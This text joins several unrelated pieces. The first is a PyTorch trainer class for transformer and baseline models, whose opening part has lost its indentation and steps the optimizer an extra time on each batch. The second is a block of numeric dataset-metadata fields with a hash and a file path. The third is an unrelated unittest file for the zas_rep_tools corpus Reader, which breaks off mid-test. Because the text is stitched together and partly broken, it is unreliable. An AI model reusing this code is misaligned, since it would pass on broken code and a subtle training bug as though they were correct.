for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
mininterval=0.5, desc=f'epoch {epoch} training'):
loss = self.model(X)
if grad_accum_every > 1:
if i % grad_accum_every <= (grad_accum_every - 1):
loss.backward()
if i % grad_accum_every == (grad_accum_every - 1):
optimizer.step()
optimizer.zero_grad()
else:
loss.backward()
optimizer.step()
optimizer.zero_grad()
batch_loss = loss.item()
optimizer.step()
optimizer.zero_grad()
self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
cum_loss += batch_loss
epoch_loss = cum_loss / len(train_loader)
self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
print(f'epoch avg train loss: {epoch_loss}')
return epoch_loss
@torch.no_grad()
def evaluate(self, val_loader, epoch, prefix='val'):
self.model.eval()
cum_loss = 0
for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
mininterval=0.5, desc=f'epoch {epoch} evaluation'):
loss = self.model(X)
cum_loss += loss.item()
epoch_loss = cum_loss / len(val_loader)
if self.writer is not None:
self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
print(f'epoch avg {prefix} loss: {epoch_loss:.3f}')
return epoch_loss
@torch.no_grad()
def predict(self, data_loader, epoch, device, prefix="val"):
self.model.eval()
y_score = torch.tensor([]).to(device)
y_true = torch.tensor([]).to(device)
for i, X in tqdm.tqdm(enumerate(data_loader), total=len(data_loader),
mininterval=0.5, desc=f'epoch {epoch} prediction'):
targets = X[-1]
y_true = torch.cat((y_true, targets))
if self.clf_or_reg == 'clf':
logits = self.model(X, predict=True)
y_score = torch.cat((y_score, F.softmax(logits, dim=1)))
elif self.clf_or_reg == 'reg':
preds = self.model(X, predict=True)
y_score = torch.cat((y_score, preds))
y_true = y_true.cpu()
y_score = y_score.cpu()
metrics = {}
if self.clf_or_reg == 'clf':
acc = accuracy_score(y_true, torch.argmax(y_score, dim=1), normalize=True)
bal_acc = balanced_accuracy_score(y_true, torch.argmax(y_score, dim=1))
roc_auc = roc_auc_score(y_true, y_score[:, 1])
metrics = {'acc': acc, 'bal_acc': bal_acc, 'roc_auc': roc_auc}
if self.writer is not None:
self.writer.add_scalar(prefix + '/acc', acc, epoch)
self.writer.add_scalar(prefix + '/bal_acc', bal_acc, epoch)
self.writer.add_scalar(prefix + '/roc_auc', roc_auc, epoch)
print(f'epoch {prefix}/roc_auc = {roc_auc}, {prefix}/bal_acc = {bal_acc}, {prefix}/acc = {acc}')
elif self.clf_or_reg == 'reg':
mse = mean_squared_error(y_true, y_score)
r2 = r2_score(y_true, y_score)
exp_var = explained_variance_score(y_true, y_score)
metrics = {"mse": mse, "r2": r2, "exp_var": exp_var}
if self.writer is not None:
self.writer.add_scalar(prefix + '/mse', mse, epoch)
self.writer.add_scalar(prefix + '/r2', r2, epoch)
self.writer.add_scalar(prefix + '/exp_var', exp_var, epoch)
print(f'epoch {prefix}/mse = {mse}, {prefix}/r2 = {r2}, {prefix}/exp_var = {exp_var}')
return y_score, y_true, metrics
@torch.no_grad()
def write_embeddings(self, step, mappings, labeller, seq_len, device):
    """Log embeddings of the 2000 most frequent training tokens.

    The token ids are pushed through the model's token-embedding layer in
    chunks of ``seq_len`` (bounds peak device memory), then written to the
    TensorBoard projector with human-readable labels from ``labeller``.
    """
    self.model.eval()
    token_ids = torch.tensor(list(mappings.top_n_train_tokens(2000).keys()),
                             dtype=torch.int)
    embeddings = torch.Tensor().to(device)
    for chunk in torch.split(token_ids, seq_len):
        embeddings = torch.cat((embeddings,
                                self.model.net.token_emb(chunk.to(device))))
    labels = list(map(labeller.token2label, token_ids.cpu().numpy()))
    self.writer.add_embedding(embeddings,
                              metadata=labels,
                              global_step=step,
                              tag='token_embeddings')
class BaselineMethods:
    """Training / evaluation / prediction driver for baseline models.

    The wrapped ``model`` is expected to return a scalar loss when called
    with a batch, and predictions/logits when called with ``predict=True``.
    Unlike the transformer trainer above, ``writer`` is assumed to always
    be set (no ``None`` guards here).
    """

    def __init__(self, model, writer, clf_or_reg='clf'):
        self.model = model
        self.writer = writer
        # Selects the metric suite used by predict(): 'clf' or 'reg'.
        self.clf_or_reg = clf_or_reg

    def train(self, train_loader, optimizer, epoch, grad_accum_every=1):
        """Run one training epoch and return the mean per-batch loss.

        When ``grad_accum_every`` > 1, gradients are accumulated over that
        many batches before each optimizer step.
        """
        self.model.train()
        cum_loss = 0
        for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
                              mininterval=0.5, desc=f'epoch {epoch} training'):
            loss = self.model(X)
            loss.backward()
            # Step once every `grad_accum_every` batches (every batch when
            # it is 1). BUGFIX: the original issued an unconditional extra
            # optimizer.step()/zero_grad() after this branch, which stepped
            # twice per batch and broke accumulation mid-cycle; the inner
            # `i % n <= n-1` guard was also always true and has been dropped.
            if (i + 1) % grad_accum_every == 0:
                optimizer.step()
                optimizer.zero_grad()
            batch_loss = loss.item()
            self.writer.add_scalar('batch_loss/train', batch_loss,
                                   epoch * len(train_loader) + i)
            cum_loss += batch_loss
        # NOTE(review): the loss is not scaled by 1/grad_accum_every and a
        # trailing partial accumulation window leaves gradients unstepped —
        # both match the original's apparent intent; confirm if that matters.
        epoch_loss = cum_loss / len(train_loader)
        self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
        print(f'epoch avg train loss: {epoch_loss}')
        return epoch_loss

    @torch.no_grad()
    def evaluate(self, val_loader, epoch, prefix="val"):
        """Compute, log, and return the mean validation loss for one epoch."""
        self.model.eval()
        cum_loss = 0
        for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
                              mininterval=0.5, desc=f'epoch {epoch} evaluation'):
            loss = self.model(X)
            cum_loss += loss.item()
        epoch_loss = cum_loss / len(val_loader)
        self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
        print(f'epoch avg {prefix} loss: {epoch_loss}')
        return epoch_loss

    @torch.no_grad()
    def predict(self, data_loader, epoch, device, prefix="val"):
        """Run inference and compute epoch metrics.

        Returns ``(y_score, y_true, metrics)`` where ``metrics`` holds
        classification (acc / bal_acc / roc_auc) or regression
        (mse / r2 / exp_var) scores depending on ``self.clf_or_reg``;
        it is empty for any other value. All metrics are also written to
        TensorBoard under ``<prefix>/<metric>``.
        """
        self.model.eval()
        y_score = torch.tensor([]).to(device)
        y_true = torch.tensor([]).to(device)
        for i, X in tqdm.tqdm(enumerate(data_loader), total=len(data_loader),
                              mininterval=0.5, desc=f'epoch {epoch} prediction'):
            # By convention the last element of each batch holds the targets.
            targets = X[-1]
            y_true = torch.cat((y_true, targets))
            if self.clf_or_reg == 'clf':
                logits = self.model(X, predict=True)
                y_score = torch.cat((y_score, F.softmax(logits, dim=1)))
            elif self.clf_or_reg == 'reg':
                preds = self.model(X, predict=True)
                y_score = torch.cat((y_score, preds))
        y_true = y_true.cpu()
        y_score = y_score.cpu()
        metrics = {}
        if self.clf_or_reg == 'clf':
            acc = accuracy_score(y_true, torch.argmax(y_score, dim=1), normalize=True)
            bal_acc = balanced_accuracy_score(y_true, torch.argmax(y_score, dim=1))
            # NOTE(review): y_score[:, 1] assumes a binary task — confirm.
            roc_auc = roc_auc_score(y_true, y_score[:, 1])
            metrics = {'acc': acc, 'bal_acc': bal_acc, 'roc_auc': roc_auc}
            self.writer.add_scalar(prefix + '/acc', acc, epoch)
            self.writer.add_scalar(prefix + '/bal_acc', bal_acc, epoch)
            self.writer.add_scalar(prefix + '/roc_auc', roc_auc, epoch)
            self.writer.add_pr_curve(prefix + '/pr_curve', y_true, y_score[:, 1], epoch)
            print(f'epoch {prefix}/roc_auc = {roc_auc}, {prefix}/bal_acc = {bal_acc}, {prefix}/acc = {acc}')
        elif self.clf_or_reg == 'reg':
            mse = mean_squared_error(y_true, y_score)
            r2 = r2_score(y_true, y_score)
            exp_var = explained_variance_score(y_true, y_score)
            metrics = {"mse": mse, "r2": r2, "exp_var": exp_var}
            self.writer.add_scalar(prefix + '/mse', mse, epoch)
            self.writer.add_scalar(prefix + '/r2', r2, epoch)
            self.writer.add_scalar(prefix + '/exp_var', exp_var, epoch)
            print(f'epoch {prefix}/mse = {mse}, {prefix}/r2 = {r2}, {prefix}/exp_var = {exp_var}')
        return y_score, y_true, metrics
| 44.788162
| 108
| 0.573972
| 1,865
| 14,377
| 4.156568
| 0.077212
| 0.04644
| 0.048633
| 0.063725
| 0.910604
| 0.888932
| 0.888932
| 0.867776
| 0.828947
| 0.820949
| 0
| 0.008556
| 0.308966
| 14,377
| 320
| 109
| 44.928125
| 0.771716
| 0
| 0
| 0.858657
| 0
| 0.014134
| 0.095987
| 0.013216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04947
| false
| 0
| 0.014134
| 0
| 0.106007
| 0.035336
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d998cb9256cbcf293a7baa2fd2fe919d200c55be
| 31,385
|
py
|
Python
|
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : Tests for XXX Module
# Author:
# c(Developer) -> {'Egor Savin'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Program Info######
#
#
#
#
#
import unittest
import os
import logging
import codecs
import sure
import copy
from nose.plugins.attrib import attr
from testfixtures import tempdir, TempDirectory
from distutils.dir_util import copy_tree
#from zas_rep_tools.src.classes.configer import Configer
from zas_rep_tools.src.classes.reader import Reader
from zas_rep_tools.src.utils.debugger import p, wipd, wipdn, wipdl, wipdo
from zas_rep_tools.src.utils.helpers import LenGen, path_to_zas_rep_tools, get_number_of_streams_adjust_cpu
from zas_rep_tools.src.utils.basetester import BaseTester
class TestZASreaderReader(BaseTester,unittest.TestCase):
    """Integration tests for ``Reader`` lazy iteration over test corpora.

    Exercises txt/csv/xml/json (and zipped) corpus reading, column
    selection via ``colnames``, and multi-stream (parallel) generators.
    Fixtures — ``blogger_corpus()`` / ``twitter_corpus()`` and the
    ``self.tempdir_*`` / ``self.*_set`` paths — come from ``BaseTester``.
    """
    # Allow the nose multiprocess plugin to split this class across workers.
    _multiprocess_can_split_ = True
    #_multiprocess_shared_ = True
    #@classmethod
    def setUp(self):
        """Delegate per-test fixture setup to BaseTester."""
        #p(str(super))
        # NOTE(review): super(type(self), self) recurses infinitely if this
        # class is ever subclassed; safe only while it stays a leaf class.
        super(type(self), self).setUp()
        #super(BaseTester, self).__init__()
        #p(self.__dict__)
    #@classmethod
    def tearDown(self):
        """Delegate per-test fixture teardown to BaseTester."""
        super(type(self), self).tearDown()
    ####################################################################################################
    ####################################################################################################
    ###################### START STABLE TESTS #########################################################
    ####################################################################################################
    ####################################################################################################
    ###################INITIALISATION:000############################################
    ###### xxx: 000 ######
    ##### xx :0== ######
    @attr(status='stable')
    #@wipd
    def test_reader_initialisation_000(self):
        """A Reader can be constructed over the blogger txt corpus."""
        self.blogger_corpus()
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode)
        reader.should.be.a(Reader)
    ##### throws_exceptions:050 ######
    #################################Beginn##############################################
    ############################INTERN METHODS###########################################
    #####################################################################################
    ################### :100############################################
    ###### ***** ######
    #@attr(status='stable')
    #@wipd
    #def test_XXX_name_100(self):
    ##self.logger_initialisation()
    # pass
    ###### ***** ######
    ###### ***** ######
    #################################END#################################################
    ############################INTERN METHODS###########################################
    #####################################################################################
    #################################Beginn##############################################
    ############################EXTERN METHODS###########################################
    #####################################################################################
    #{'text': u"urlLink Drawing Game It's PICTIONARY. It's very cool.", 'stern': 'Pisces', 'working_area': 'indUnk', 'age': '24', 'number': '416465', 'gender': 'male'}
    ################### :500############################################
    ###### TXT ######
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_txt_in_zip_500(self):
        """Lazy txt reading works from inside zip archives; rows have all 6 columns."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            #p(data)
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
            #p(data)
    ###### TXT ######
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_txt_500(self):
        """Lazy txt reading yields complete 6-column row dicts."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            #p(data)
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
            #p(data)
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_txt_for_given_colnames_501(self):
        """getlazy(colnames=...) restricts txt rows to the requested columns."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 3
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'gender' in data
            #p(data)
    ###### csv ######
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_csv_with_ascii_502(self):
        """Lazy csv reading (ascii set) yields rows matching the blogger schema."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_small_fake_set), "csv", mode=self.mode,end_file_marker=end_file_marker)
        for data in reader.getlazy():
            #p(data)
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == len(self.configer.docs_row_values(token=True, unicode_str=True)["blogger"][0])
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_csv_with_utf8_503(self):
        """Lazy csv reading (utf-8 set) yields rows matching the blogger schema."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_hightrepetativ_set ), "csv", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == len(self.configer.docs_row_values(token=True, unicode_str=True)["blogger"][0])
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_csv_for_given_colnames_504(self):
        """getlazy(colnames=...) restricts csv rows to the requested columns."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_small_fake_set), "csv", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
            #p(data)
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 3
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'gender' in data
    ###### XML ######
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_xml_with_ascii_505(self):
        """Lazy xml reading (ascii set) yields complete 6-column row dicts."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_small_fake_set), "xml", mode=self.mode, end_file_marker=end_file_marker)
        #p(reader.getlazy())
        #p(len(reader.getlazy()))
        for data in reader.getlazy():
            if data == end_file_marker:
                continue
            #p(data)
            #p(type(data))
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_xml_with_utf8_506(self):
        """Lazy xml reading (utf-8 set) yields complete 6-column row dicts."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_hightrepetativ_set), "xml", mode=self.mode,end_file_marker=end_file_marker)
        for data in reader.getlazy():
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_xml_for_given_colnames_507(self):
        """getlazy(colnames=...) restricts xml rows to the requested columns."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_small_fake_set), "xml", mode=self.mode, end_file_marker=end_file_marker)
        #reader = Reader(os.path.join(os.path.join(self.path_to_zas_rep_tools,self.path_to_test_sets_for_blogger_Corpus), self.xml_blogger_small_fake_set), "xml", mode=self.mode)
        for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 3
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'gender' in data
    ###### JSON ######
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_json_with_ascii_508(self):
        """Lazy json reading (ascii set) yields complete 6-column row dicts."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_small_fake_set), "json", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            #p(data, "data")
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_json_with_utf8_509(self):
        """Lazy json reading (utf-8 set) yields complete 6-column row dicts."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_hightrepetativ_set ), "json", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 6
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'working_area' in data
            assert 'age' in data
            assert 'id' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_json_for_given_colnames_510(self):
        """getlazy(colnames=...) restricts json rows to the requested columns."""
        self.blogger_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_small_fake_set), "json", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
            if data == end_file_marker:
                continue
            assert isinstance(data, dict)
            assert len(data) == 3
            assert 'text' in data
            assert 'star_constellation' in data
            assert 'gender' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_twitter_json_with_utf8_511(self):
        """Twitter-stream json is normalized by the TwitterStreamAPI formatter."""
        self.twitter_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_twitter_corp, self.json_twitter_set), "json", formatter_name="TwitterStreamAPI", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy():
            if data == end_file_marker:
                continue
            if data:
                #p(data, c="r")
                assert isinstance(data, dict)
                #p(data["text"])
                assert 'text' in data
                assert 'u_lang' in data
                assert 'id' in data
                assert 'u_id' in data
    @attr(status='stable')
    #@wipd
    def test_lazyreader_from_twitter_json_for_given_colnames_512(self):
        """colnames selection works together with the TwitterStreamAPI formatter."""
        self.twitter_corpus()
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_twitter_corp, self.json_twitter_set), "json", formatter_name="TwitterStreamAPI", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy(colnames=["text"]):
            if data == end_file_marker:
                continue
            if data:
                assert isinstance(data, dict)
                assert len(data)==1
                assert 'text' in data
    # NOTE(review): @attr(status='stable') is commented out below, so this
    # test is not part of the stable suite — confirm whether intentional.
    #@attr(status='stable')
    #@wipd
    def test_lazyreader_from_sifter_twitter_csv_with_utf8_513(self):
        """Sifter-exported twitter csv (';'-delimited) is normalized correctly."""
        self.twitter_corpus()
        end_file_marker = -1
        #self.mode = "prod+"
        reader = Reader(os.path.join(self.tempdir_twitter_corp, "CSV/zas-rep-tool/sifter"), "csv", formatter_name="sifter", mode=self.mode, end_file_marker=end_file_marker)
        for data in reader.getlazy(csvdelimiter=";"):
            if data == end_file_marker:
                continue
            if data:
                #p(data, c="r")
                assert isinstance(data, dict)
                #p(data["text"])
                assert 'text' in data
                assert 'u_lang' in data
                assert 'id' in data
                assert 'u_id' in data
    ###### ZIPs 515######
    @attr(status='stable')
    #@wipd
    def test_getlazy_many_streams_from_csv_also_getted_from_zips_516(self):
        """Multi-stream getlazy over csv (incl. zips) yields each file exactly once."""
        self.blogger_corpus()
        # Test 1: Check if number of getted files is correct
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp), "csv", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
        number_of_found_files = reader._get_number_of_left_over_files()
        if number_of_found_files < 3:
            assert False
        if reader.files_number_in_zips != len(reader.files_to_read_orig):
            ## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
            assert False
        # Each end_file_marker marks one finished file, so counting markers
        # counts files actually read across all streams.
        number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
        if number_of_found_files != number_getted_files:
            assert False
        #p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
        # Test 2: check if right number of streams will be returned
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
        i = 0
        for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
            for row_dict in gen:
                #i+=1
                if row_dict == end_file_marker:
                    i+=1
                    continue
                #p(row_dict)
                assert isinstance(row_dict, dict)
                #assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        assert number_of_found_files == i
    @attr(status='stable')
    #@wipdl
    def test_getlazy_many_streams_from_xml_also_getted_from_zips_517(self):
        """Multi-stream getlazy over xml (incl. zips) yields each file exactly once."""
        self.blogger_corpus()
        # Test 1: Check if number of getted files is correct
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp), "xml", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
        number_of_found_files = reader._get_number_of_left_over_files()
        if number_of_found_files < 3:
            assert False
        if reader.files_number_in_zips != len(reader.files_to_read_orig):
            ## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
            assert False
        number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
        if number_of_found_files != number_getted_files:
            assert False
        #p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
        # Test 2: check if right number of streams will be returned
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
        i = 0
        for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
            for row_dict in gen:
                #p(row_dict)
                #i+=1
                if row_dict == end_file_marker:
                    i+=1
                    continue
                assert isinstance(row_dict, dict)
                assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        assert number_of_found_files == i
    @attr(status='stable')
    #@wipd
    def test_getlazy_many_streams_from_txt_also_getted_from_zips_518(self):
        """Multi-stream getlazy over txt (incl. zips) yields each file exactly once."""
        self.blogger_corpus()
        # Test 1: Check if number of getted files is correct
        end_file_marker = -1
        #p(self.mode, c="r")
        reader = Reader(os.path.join(self.tempdir_blogger_corp), "txt", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True, regex_template="blogger")
        number_of_found_files = reader._get_number_of_left_over_files()
        if number_of_found_files < 3:
            assert False
        if reader.files_number_in_zips != len(reader.files_to_read_orig):
            ## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
            assert False
        number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
        if number_of_found_files != number_getted_files:
            assert False
        #p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
        # Test 2: check if right number of streams will be returned
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
        i = 0
        for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
            for row_dict in gen:
                #p(row_dict)
                #i+=1
                if row_dict == end_file_marker:
                    i+=1
                    continue
                assert isinstance(row_dict, dict)
                assert len(row_dict) == 6
                assert 'text' in row_dict
                assert 'star_constellation' in row_dict
                assert 'working_area' in row_dict
                assert 'age' in row_dict
                assert 'id' in row_dict
                assert 'gender' in row_dict
        assert number_of_found_files == i
    @attr(status='stable')
    #@wipdl
    def test_getlazy_many_streams_from_json_also_getted_from_zips_519(self):
        """Multi-stream getlazy over json (incl. zips) yields each file exactly once."""
        self.blogger_corpus()
        # Test 1: Check if number of getted files is correct
        end_file_marker = -1
        reader = Reader(os.path.join(self.tempdir_blogger_corp), "json", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
        number_of_found_files = reader._get_number_of_left_over_files()
        if number_of_found_files < 3:
            assert False
        if reader.files_number_in_zips != len(reader.files_to_read_orig):
            ## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
            assert False
        number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
        if number_of_found_files != number_getted_files:
            assert False
        #p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
        # Test 2: check if right number of streams will be returned
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
        len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
